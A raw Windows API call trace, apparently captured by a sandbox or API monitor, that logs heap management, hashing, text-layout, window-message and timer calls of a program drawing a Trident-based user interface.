0 [0176.797] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0176.797] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0176.797] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0176.797] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0176.798] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f831c0 [0176.798] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.798] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0176.798] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0176.798] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0176.798] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0176.799] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0176.799] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0176.799] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f830a0 [0176.800] GetSysColor (nIndex=15) returned 0xf0f0f0 [0176.800] GetSysColor (nIndex=15) returned 0xf0f0f0 [0176.801] GetSysColor (nIndex=15) returned 0xf0f0f0 [0176.801] GetSysColor (nIndex=15) returned 0xf0f0f0 [0176.802] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.802] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f830b8 [0176.803] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f831c0 | out: hHeap=0x5e0000) returned 1 [0176.803] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f830a0 | out: hHeap=0x5e0000) returned 1 [0176.803] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f830b8 | out: hHeap=0x5e0000) returned 1 [0176.803] LsSetDoc () returned 0x0 [0176.803] LsCreateLine () returned 0x0 [0176.804] LsDisplayLine () returned 0x0 [0176.882] LsDestroyLine () returned 0x0 [0176.882] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6ce0 [0176.883] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f830a0 [0176.883] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7d28 [0176.883] HashData (in: pbData=0x9f830a4, cbData=0x4, pbHash=0x9f830a8, cbHash=0x2 | out: pbHash=0x9f830a8) returned 0x0 [0176.883] HashData (in: pbData=0x6d7d28, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.883] HashData (in: pbData=0x6d7d2a, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.883] HashData (in: pbData=0x6d7d2c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.883] HashData (in: pbData=0x6d7d34, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.883] HashData (in: pbData=0x6d7d3c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.883] HashData (in: pbData=0x6d7d44, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.883] HashData (in: pbData=0x6d7d46, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.883] HashData (in: pbData=0x6d7d48, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.883] HashData (in: pbData=0x6d7d50, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.883] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0176.883] HashData (in: pbData=0x6d7d5c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.883] HashData (in: pbData=0x6d7d64, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.883] HashData (in: pbData=0x6d7d70, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.883] HashData (in: pbData=0x6d7d74, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.883] HashData (in: pbData=0x6d7d7c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.883] HashData (in: pbData=0x6d7d88, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.884] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7d28 | out: hHeap=0x5e0000) returned 1 [0176.884] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f830a0 | out: hHeap=0x5e0000) returned 1 [0176.884] HashData (in: pbData=0x9ee6ce0, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0176.884] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0176.884] HashData (in: pbData=0x9ee6ce4, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0176.884] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6ce0 | out: hHeap=0x5e0000) returned 1 [0176.884] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6ce0 [0176.884] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f38 [0176.884] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7d28 [0176.884] HashData (in: pbData=0x9f82f3c, cbData=0x4, pbHash=0x9f82f40, cbHash=0x2 | out: pbHash=0x9f82f40) returned 0x0 [0176.884] HashData (in: pbData=0x6d7d28, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.884] HashData (in: pbData=0x6d7d2a, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.884] HashData (in: pbData=0x6d7d2c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.884] HashData (in: pbData=0x6d7d34, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.884] HashData (in: pbData=0x6d7d3c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.884] HashData (in: pbData=0x6d7d44, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.885] HashData (in: pbData=0x6d7d46, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.885] HashData (in: pbData=0x6d7d48, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.885] HashData (in: pbData=0x6d7d50, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.885] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0176.885] HashData (in: pbData=0x6d7d5c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.885] HashData (in: pbData=0x6d7d64, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.885] HashData (in: pbData=0x6d7d70, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.885] HashData (in: pbData=0x6d7d74, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.885] HashData (in: pbData=0x6d7d7c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.885] HashData (in: pbData=0x6d7d88, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.885] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7d28 | out: hHeap=0x5e0000) returned 1 [0176.885] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f38 | out: hHeap=0x5e0000) returned 1 [0176.885] HashData (in: pbData=0x9ee6ce0, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0176.885] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0176.885] HashData (in: pbData=0x9ee6ce4, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0176.885] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6ce0 | out: hHeap=0x5e0000) returned 1 [0176.886] GetSysColor (nIndex=15) returned 0xf0f0f0 [0176.886] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7778 | out: hHeap=0x5e0000) returned 1 [0176.985] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d77e8 [0176.986] _CIsqrt () returned 0x407b027f [0176.986] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6ce0 [0176.986] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.986] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.986] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6ce0 | out: hHeap=0x5e0000) returned 1 [0176.986] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x54) returned 0x6ddd18 [0176.986] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0176.987] HashData (in: pbData=0xd95320, cbData=0x28, pbHash=0x19732c, cbHash=0x4 | out: pbHash=0x19732c) returned 0x0 [0176.987] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6ddd18 | out: hHeap=0x5e0000) returned 1 [0176.988] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6ce0 [0176.988] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f830d0 [0176.988] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d78c8 [0176.988] HashData (in: pbData=0x9f830d4, cbData=0x4, pbHash=0x9f830d8, cbHash=0x2 | out: pbHash=0x9f830d8) returned 0x0 [0176.988] HashData (in: pbData=0x6d78c8, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.988] HashData (in: pbData=0x6d78ca, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.988] HashData (in: pbData=0x6d78cc, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.988] HashData (in: pbData=0x6d78d4, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.988] HashData (in: pbData=0x6d78dc, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.988] HashData (in: pbData=0x6d78e4, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.988] HashData (in: pbData=0x6d78e6, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.988] HashData (in: pbData=0x6d78e8, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.988] HashData (in: pbData=0x6d78f0, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.988] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0176.988] HashData (in: pbData=0x6d78fc, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.988] HashData (in: pbData=0x6d7904, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.988] HashData (in: pbData=0x6d7910, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.988] HashData (in: pbData=0x6d7914, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.988] HashData (in: pbData=0x6d791c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0176.988] HashData (in: pbData=0x6d7928, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0176.988] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d78c8 | out: hHeap=0x5e0000) returned 1 [0176.988] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f830d0 | out: hHeap=0x5e0000) returned 1 [0176.988] HashData (in: pbData=0x9ee6ce0, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0176.998] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0176.998] HashData (in: pbData=0x9ee6ce4, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0176.998] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6ce0 | out: hHeap=0x5e0000) returned 1 [0176.998] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0176.998] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0176.998] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0176.998] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0176.998] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0176.998] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0177.002] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f50 [0177.003] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0177.003] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0177.003] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0177.003] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0177.003] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0177.003] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0177.003] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0177.004] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f830a0 [0177.004] GetSysColor (nIndex=15) returned 0xf0f0f0 [0177.005] GetSysColor (nIndex=15) returned 0xf0f0f0 [0177.005] GetSysColor (nIndex=15) returned 0xf0f0f0 [0177.006] GetSysColor (nIndex=15) returned 0xf0f0f0 [0177.006] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0177.006] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f68 [0177.007] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f50 | out: hHeap=0x5e0000) returned 1 [0177.007] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f830a0 | out: hHeap=0x5e0000) returned 1 [0177.007] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f68 | out: hHeap=0x5e0000) returned 1 [0177.007] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x68caf8 | out: hHeap=0x5e0000) returned 1 [0177.073] GetClientRect (in: hWnd=0x103e2, lpRect=0x199be4 | out: lpRect=0x199be4) returned 1 [0177.073] BitBlt (hdc=0x51010a85, x=171, y=213, cx=42, cy=23, hdcSrc=0x8e01071c, x1=171, y1=213, rop=0xcc0020) returned 1 [0177.073] ReleaseDC (hWnd=0x103e2, hDC=0x51010a85) returned 1 [0177.074] ReleaseDC (hWnd=0x103e2, hDC=0x4010197) returned 1 [0177.074] QueryPerformanceCounter (in: lpPerformanceCount=0x199d00 | out: lpPerformanceCount=0x199d00*=3099589302469) returned 1 [0177.075] DeleteObject (ho=0x29040a81) returned 1 [0177.075] GetCurrentThreadId () returned 0xb48 [0177.075] InitOnceExecuteOnce (in: InitOnce=0x6e89927c, InitFn=0x6dd8e660, Parameter=0x0, Context=0x0 | out: InitOnce=0x6e89927c, Parameter=0x0, Context=0x0) returned 1 [0177.075] QueryPerformanceCounter (in: lpPerformanceCount=0x19a218 | out: lpPerformanceCount=0x19a218*=3099589408928) returned 1 [0177.075] QueryPerformanceCounter (in: lpPerformanceCount=0x19a228 | out: lpPerformanceCount=0x19a228*=3099589415154) returned 1 [0177.075] KillTimer (hWnd=0x30316, uIDEvent=0x2025) returned 1 [0177.076] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0177.076] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0177.076] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0177.076] GetWindowLongW (hWnd=0x103e4, nIndex=-21) returned 7140024 [0177.076] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0177.076] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0177.076] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0177.076] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0177.076] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0177.076] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0177.076] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0177.077] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0177.077] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0177.077] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0177.077] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 0 [0177.077] QueryPerformanceCounter (in: lpPerformanceCount=0x19a3bc | out: lpPerformanceCount=0x19a3bc*=3099589582280) returned 1 [0177.077] RedrawWindow (hWnd=0x30316, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x2) returned 1 [0177.077] NtdllDefWindowProc_W () returned 0x0 [0177.077] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0177.077] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0177.077] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0177.077] KillTimer (hWnd=0x30316, uIDEvent=0x2026) returned 1 [0177.078] QueryPerformanceCounter (in: lpPerformanceCount=0x19a26c | out: lpPerformanceCount=0x19a26c*=3099589693511) returned 1 [0177.078] QueryPerformanceCounter (in: lpPerformanceCount=0x19a23c | out: lpPerformanceCount=0x19a23c*=3099589700168) returned 1 [0177.078] QueryPerformanceCounter (in: lpPerformanceCount=0x19a218 | out: lpPerformanceCount=0x19a218*=3099589709135) returned 1 [0177.078] QueryPerformanceCounter (in: lpPerformanceCount=0x19a228 | out: lpPerformanceCount=0x19a228*=3099589791676) returned 1 [0177.079] SetEvent (hEvent=0x668) returned 1 [0177.080] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0177.080] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0177.080] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0177.080] GetWindowLongW (hWnd=0x103e4, nIndex=-21) returned 7140024 [0177.080] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 0 [0177.080] NtdllDefWindowProc_W () returned 0x0 [0177.080] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0177.080] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0177.080] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0177.080] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0177.080] KillTimer (hWnd=0x103e2, uIDEvent=0x1000) returned 1 [0177.080] GetCurrentThreadId () returned 0xb48 [0177.080] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0177.080] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0177.080] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0177.081] KillTimer (hWnd=0x30316, uIDEvent=0x2023) returned 1 [0177.081] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0177.081] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0177.081] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0177.081] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0180.587] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0180.588] NtdllDefWindowProc_W () returned 0x0 [0180.588] NtdllDefWindowProc_W () returned 0x0 [0180.588] NtdllDefWindowProc_W () returned 0x0 [0180.589] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0180.589] IsIconic (hWnd=0x103e0) returned 0 [0180.589] GetClientRect (in: hWnd=0x103e0, lpRect=0x19a374 | out: lpRect=0x19a374) returned 1 [0180.591] CopyRect (in: lprcDst=0xd0c5ac, lprcSrc=0x19a374 | out: lprcDst=0xd0c5ac) returned 1 [0180.591] OffsetRect (in: lprc=0xd0c5ac, dx=0, dy=0 | out: lprc=0xd0c5ac) returned 1 [0180.591] CopyRect (in: lprcDst=0xd0c5bc, lprcSrc=0x19a374 | out: lprcDst=0xd0c5bc) returned 1 [0180.591] OffsetRect (in: lprc=0xd0c5bc, dx=0, dy=0 | out: lprc=0xd0c5bc) returned 1 [0180.591] CopyRect (in: lprcDst=0x19a254, lprcSrc=0x19a374 | out: lprcDst=0x19a254) returned 1 [0180.591] IntersectRect (in: lprcDst=0x19a264, lprcSrc1=0x19a254, lprcSrc2=0x19a374 | out: lprcDst=0x19a264) returned 1 [0180.591] EqualRect (lprc1=0x19a264, lprc2=0x19a254) returned 1 [0180.591] CreateRectRgnIndirect (lprect=0x6d72c540) returned 0x1c040a78 [0180.592] GetUpdateRgn (hWnd=0x103e2, hRgn=0x1c040a78, bErase=0) returned 1 [0180.592] DeleteObject (ho=0x1c040a78) returned 1 [0180.592] SetWindowPos (hWnd=0x103e2, hWndInsertAfter=0x0, X=0, Y=0, cx=442, cy=256, uFlags=0x14) returned 1 [0180.592] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0180.592] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x46, wParam=0x0, lParam=0x19a1fc*=66530, plResult=0x19a058 | out: plResult=0x19a058) returned 0x1 [0180.592] NtdllDefWindowProc_W () returned 0x0 [0180.592] GetCurrentThreadId () returned 0xb48 [0180.593] GetCurrentThreadId () returned 0xb48 [0180.597] NtdllDefWindowProc_W () returned 0x0 [0180.598] NtdllDefWindowProc_W () returned 0x0 [0180.600] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0180.601] NtdllDefWindowProc_W () returned 0x0 [0180.601] NtdllDefWindowProc_W () returned 0x0 [0180.602] NtdllDefWindowProc_W () returned 0x0 [0180.602] GetWindowLongW (hWnd=0x103e4, nIndex=-21) returned 7140024 [0180.603] GetWindowLongW (hWnd=0x103bc, nIndex=-21) returned 6297072 [0180.603] NtdllDefWindowProc_W () returned 0x0 [0180.603] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0180.603] IUnknown_GetWindow (in: punk=0x0, phwnd=0x19a380 | out: phwnd=0x19a380) returned 0x80004005 [0180.603] NtdllDefWindowProc_W () returned 0x1 [0180.613] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0180.613] GetFocus () returned 0x0 [0180.613] SetFocus (hWnd=0x103e2) returned 0x0 [0180.614] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0180.614] GetMessageTime () returned 30894140 [0180.614] GetMessagePos () returned 0x11e01d6 [0180.615] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x281, wParam=0x1, lParam=0xc000000f, plResult=0x199a74 | out: plResult=0x199a74) returned 0x0 [0180.616] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0180.616] GetMessageTime () returned 30894140 [0180.616] GetMessagePos () returned 0x11e01d6 [0180.616] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0180.616] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0180.617] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0180.617] memcpy_s (in: _Destination=0xd9a7e0, _DestinationSize=0x118, _Source=0xd9a6c0, _SourceSize=0x118 | out: _Destination=0xd9a7e0) returned 0x0 [0180.617] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x12) returned 0x6dcda0 [0180.617] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0180.617] SetTimer (hWnd=0x103e2, nIDEvent=0x1000, uElapse=0x64, lpTimerFunc=0x0) returned 0x1000 [0180.618] StrCmpICW (pszStr1="notify", pszStr2="mousemove") returned 1 [0180.618] StrCmpICW (pszStr1="notify", pszStr2="mouseover") returned 1 [0180.618] StrCmpICW (pszStr1="notify", pszStr2="mousedown") returned 1 [0180.618] StrCmpICW (pszStr1="notify", pszStr2="mouseup") returned 1 [0180.618] StrCmpICW (pszStr1="notify", pszStr2="intrnlDblClick") returned 5 [0180.618] StrCmpICW (pszStr1="notify", pszStr2="propertychange") returned -2 [0180.618] StrCmpICW (pszStr1="notify", pszStr2="focus") returned 8 [0180.618] StrCmpICW (pszStr1="notify", pszStr2="blur") returned 12 [0180.618] StrCmpICW (pszStr1="notify", pszStr2="startComposition") returned -5 [0180.618] StrCmpICW (pszStr1="notify", pszStr2="endComposition") returned 9 [0180.618] StrCmpICW (pszStr1="notify", pszStr2="compositionFull") returned 11 [0180.618] StrCmpICW (pszStr1="notify", pszStr2="char") returned 11 [0180.618] StrCmpICW (pszStr1="notify", pszStr2="composition") returned 11 [0180.618] StrCmpICW (pszStr1="notify", pszStr2="notify") returned 0 [0180.618] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dcda0 | out: hHeap=0x5e0000) returned 1 [0180.619] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 